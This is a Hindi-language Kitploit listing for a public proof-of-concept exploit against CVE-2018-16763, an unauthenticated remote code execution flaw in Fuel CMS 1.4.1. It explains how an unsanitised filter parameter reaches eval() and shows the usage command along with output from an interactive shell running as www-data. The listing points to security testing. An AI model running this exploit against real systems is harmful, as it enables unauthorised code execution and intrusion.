Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — Unauthenticated RCE vulnerability in Fuel CMS 1.4.1. | Kitploit
उपकरण/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Unauthenticated RCE vulnerability in Fuel CMS 1.4.1.

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

CVE-2018-16763 — Fuel CMS 1.4.1 रिमोट कोड निष्पादन (PoC)

Fuel CMS 1.4.1 में अप्रमाणित RCE भेद्यता। /fuel/pages/select/ एंडपॉइंट में filter पैरामीटर PHP बैकएंड में eval() कॉल में बिना सैनिटाइज़ किए पास किया जाता है, जिससे एक क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादन संभव होता है। ब्लाइंड इंजेक्शन के विपरीत, आउटपुट HTTP प्रतिक्रिया में सीधे परिलक्षित होता है, इसलिए किसी मध्यवर्ती फ़ाइल की आवश्यकता नहीं है।


यह कैसे काम करता है

  1. एक विशेष रूप से तैयार किए गए filter पेलोड के साथ /fuel/pages/select/ पर एक GET अनुरोध भेजता है जो वांछित कमांड के साथ PHP के system() को कॉल करता है।
  2. regex पैटर्न का उपयोग करके HTTP प्रतिक्रिया से परिलक्षित आउटपुट को पार्स करता है।
  3. कमांड आउटपुट सीधे इंटरैक्टिव शेल पर लौटाता है।

आवश्यकताएँ

  • Python 3
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

उपयोग

root@kitploit:~
python3 exploit.py -t http://TARGET

उदाहरण:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

संदर्भ

  • CVE-2018-16763
  • EDB-47138

श्रेय

  • खोज और मूल शोषण: Syed Sheeraz Ali
  • सफाई और इंटरैक्टिव शेल: Esteban Zárate
टूल डाउनलोड करें